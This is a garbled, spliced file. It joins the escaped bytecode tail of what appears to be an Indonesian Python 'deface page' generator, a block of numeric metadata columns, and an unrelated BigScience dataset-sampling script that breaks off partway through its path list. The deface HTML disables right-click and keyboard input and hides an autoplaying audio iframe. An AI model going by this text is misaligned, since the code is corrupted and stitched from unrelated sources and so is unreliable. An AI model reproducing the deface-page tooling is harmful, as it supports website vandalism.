+\n\nTypingText.currentIndex++;\nTypingText.all.push(this);\nthis.running = false;\nthis.inTag = false;\nthis.tagBuffer = "";\nthis.inHTMLEntity = false;\nthis.HTMLEntityBuffer = "";\n}\nTypingText.all = new Array();\nTypingText.currentIndex = 0;\nTypingText.runAll = function() {\nfor(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();\n}\nTypingText.prototype.run = function() {\nif(this.running) return;\nif(typeof this.origText == "undefined") {\nsetTimeout("document.getElementById(\'" + this.element.id +\n\n"\').typingText.run()", this.interval);\nreturn;\n}\nif(this.currentText == "") this.element.innerHTML = "";\nif(this.currentChar < this.origText.length) {\nif(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {\nthis.tagBuffer = "<";\nthis.inTag = true;\nthis.currentChar++;\nthis.run();\nreturn;\n} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {\nthis.tagBuffer += ">";\nthis.inTag = false;\nthis.currentText += this.tagBuffer;\nthis.currentChar++;\nthis.run();\nreturn;\n} else if(this.inTag) {\nthis.tagBuffer += this.origText.charAt(this.currentChar);\nthis.currentChar++;\nthis.run();\nreturn;\n} else if(this.origText.charAt(this.currentChar) == "&" && !\n\nthis.inHTMLEntity) {\nthis.HTMLEntityBuffer = "&";\nthis.inHTMLEntity = true;\nthis.currentChar++;\nthis.run();\nreturn;\n} else if(this.origText.charAt(this.currentChar) == ";" &&\n\nthis.inHTMLEntity) {\nthis.HTMLEntityBuffer += ";";\nthis.inHTMLEntity = false;\nthis.currentText += this.HTMLEntityBuffer;\nthis.currentChar++;\nthis.run();\nreturn;\n} else if(this.inHTMLEntity) {\nthis.HTMLEntityBuffer += this.origText.charAt(this.currentChar);\nthis.currentChar++;\nthis.run();\nreturn;\n} else {\nthis.currentText += this.origText.charAt(this.currentChar);\n}\nthis.element.innerHTML = this.currentText;\nthis.element.innerHTML += (this.currentChar < this.origText.length - 1 ?\n\n(typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) :\n\n"");\nthis.currentChar++;\nsetTimeout("document.getElementById(\'" + this.element.id +\n\n"\').typingText.run()", this.interval);\n} else {\nthis.currentText = "";\nthis.currentChar = 0;\nthis.running = false;\nthis.finishedCallback();\n}\n}\n</script>\n\n<!-- AdFender script begin --><script type=\'text/javascript\' src=\'http://local.adfender.com/adfender/elemhide.js\'></script><!-- AdFender script end -->\n<!-- AdFender script begin --><script type=\'text/javascript\' src=\'http://local.adfender.com/adfender/elemhide.js\'></script><!-- AdFender script end -->\n</head>\n<body oncontextmenu=\'return false;\' onkeydown=\'return false;\' onmousedown=\'return false;\' ondragstart=\'return false\' onselectstart=\'return false\' style=\'-moz-user-select: none; cursor: default;\'>\n<br/>\n<div id="wrapper">\n<div class="box">\n<center></font><font color="#00BFFF" size="5px"> <br> Message: \n<div id="console"><span class="prefix">\n<p id="message">\n\n</font><font color="#00BFFF" size="4px">s)\x04\x00\x00<script type="text/javascript">\nnew TypingText(document.getElementById("message"), 50, function(i){ var ar\n\n= new Array("|", "|", "|", "|"); return " " + ar[i.length % ar.length]; });\n\n//Type out examples:\nTypingText.runAll();\n</script>\n<input text="test" id="commander" onkeyup="execute(this,event);" disabled="disabled" style="width:786px;"/>\n</div>\n<div class="spacer"></div></center>\n\n\n<!-- CSS --><style>\n.CenterDiv{width:650px;border:1px #ff0000 solid;padding:5px;margin:0px auto; background: url(\'https://3.bp.blogspot.com/-5Ma3lIrkPCk/W5p-c6bBmsI/AAAAAAAAALw/Gh-OIZLSiJc3QRCyShSytMNAtpUQoSSXQCLcBGAs/s320/Gambar%2BAnimasi%2BPetir%2BBergerak%2BWallpaper%2BKilat%2BMerah%2BLuar%2BBiasa.gif\');}\n</style><br><br></div><br>\n\n<center><marquee behavior="scroll" direction="left" scrollamount="100" scrolldelay="40" width="100%"> <font color="gold">___________________________________________________________</font></marquee>\n\n\n<marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="20" width="50%">\n<FONT face="Tahoma" size="4" color="##00FF00">s\x80\x01\x00\x00</FONT>\n</b></marquee><marquee behavior="scroll" direction="right" scrollamount="100" scrolldelay="40" width="100%"> \n<font color="gold">___________________________________________________________</font></marquee>\n<iframe width="0" height="0" src="https://api.soundcloud.com/tracks/312530137/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" frameborder="0" allowfullscreen></iframe>s\x07\x00\x00\x00wait...i\x02\x00\x00\x00s\x10\x00\x00\x00script tersimpang\x9a\x99\x99\x99\x99\x99\xd9?s\x15\x00\x00\x00memindahkan ke Sdcardi\x03\x00\x00\x00s\x1c\x00\x00\x00Berhasil Tersimpan Di Sdcards\x07\x00\x00\x00/sdcard(!\x00\x00\x00t\x04\x00\x00\x00timet\x06\x00\x00\x00shutilt\x02\x00\x00\x00lrt\x02\x00\x00\x00lgt\x01\x00\x00\x00yt\x02\x00\x00\x00lbt\x02\x00\x00\x00cyt\x01\x00\x00\x00xt\t\x00\x00\x00raw_inputt\x05\x00\x00\x00titlet\x04\x00\x00\x00nickt\x05\x00\x00\x00imaget\x04\x00\x00\x00tekst\x04\x00\x00\x00marqt\x06\x00\x00\x00outputt\x04\x00\x00\x00opent\x02\x00\x00\x00mxt\x08\x00\x00\x00ganteng1t\x08\x00\x00\x00ganteng2t\x08\x00\x00\x00ganteng3t\x08\x00\x00\x00ganteng4t\x08\x00\x00\x00ganteng5t\x08\x00\x00\x00ganteng6t\x08\x00\x00\x00ganteng7t\x08\x00\x00\x00ganteng8t\x08\x00\x00\x00ganteng9t\x0b\x00\x00\x00messagescrit\x0c\x00\x00\x00messagescritt\x05\x00\x00\x00writet\x05\x00\x00\x00sleept\x05\x00\x00\x00closet\x04\x00\x00\x00movet\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x08\x00\x00\x00<module>\x07\x00\x00\x00sv\x00\x00\x00\x0c\x01\x0c\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x01\x01\t\x01\t\x01\t\x01\x01\x01\t\x01\x0c\x01\x05\x01\x0c\x01\x05\x01\x0c\x01\x05\x01\x0c\x01\x05\x01\x0c\x01\x01\x01\t\x01\x0c\x04\x17\x02\x06\x01\x06G\x06\x01\x06\x08\x06\x01\x06y\x06\x01\x06\x16\x06\x01\x06\x04\x06\x02\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\r\x01\x05\x01\x05\x01\r\x01\t\x01\r\x01\x05\x01\n\x01\x18\x01'))
| 2,264.166667
| 13,503
| 0.713139
| 2,049
| 13,585
| 4.669595
| 0.245486
| 0.067726
| 0.031982
| 0.077759
| 0.364548
| 0.321593
| 0.279578
| 0.275502
| 0.26087
| 0.203386
| 0
| 0.184102
| 0.038793
| 13,585
| 5
| 13,504
| 2,717
| 0.548629
| 0.004417
| 0
| 0
| 0
| 4
| 0.938766
| 0.673347
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
ec3fa67d199843a9f351dc900507b54a080b649e
| 74,229
|
py
|
Python
|
data/catalogue/sample_and_convert_to_jsonl.py
|
cakiki/bigscience
|
7ccf7e42577fe71e88cf8bed3b9ca965c7afb8f7
|
[
"Apache-2.0"
] | null | null | null |
data/catalogue/sample_and_convert_to_jsonl.py
|
cakiki/bigscience
|
7ccf7e42577fe71e88cf8bed3b9ca965c7afb8f7
|
[
"Apache-2.0"
] | 1
|
2022-03-17T16:18:35.000Z
|
2022-03-17T16:18:35.000Z
|
data/catalogue/sample_and_convert_to_jsonl.py
|
cakiki/bigscience
|
7ccf7e42577fe71e88cf8bed3b9ca965c7afb8f7
|
[
"Apache-2.0"
] | null | null | null |
import argparse
import logging
import re
from pathlib import Path
from datasets import Dataset, load_from_disk
from datasets.utils.logging import set_verbosity_info
from numpy.random import default_rng
set_verbosity_info()
logger = logging.getLogger(__name__)
rng = default_rng(42)
CATALOGUE_DATASETS = {
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_enriched_conllu_ancora_for_ml_training": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_parlament_parla": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_odiencorp": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_book_dash_books": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_uit_vsmec": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_talpco": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_book_dash_books": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vietnamese_students_feedback": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_xquad_ca": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikimedia_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_401_www_elperiodicodemexico_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indonesian_frog_storytelling_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-tum_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indonli": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-bm_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ki_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_viquiquad": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ak_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ts_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-st_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_vilaquad": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_bangla_sentiment_classification_datasets": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ny_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikimedia_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-tw_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-tn_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikimedia_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ln_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-nso_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vinbigdata_asr_vlsp_2020": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikimedia_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_scielo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-rn_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vinbigdata_mt_vlsp_2020": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_parallel": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_bppt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-wo_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zht_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-lg_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_502_www_ricemedia_co": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zhs_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-fon_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_recibrew": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-sn_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_arabench": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_30_www_radiocable_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-zu_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_pseudocrawl-filtered_674_ai_baidu_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_ester": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ig_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikibooks_filtered": 1.,
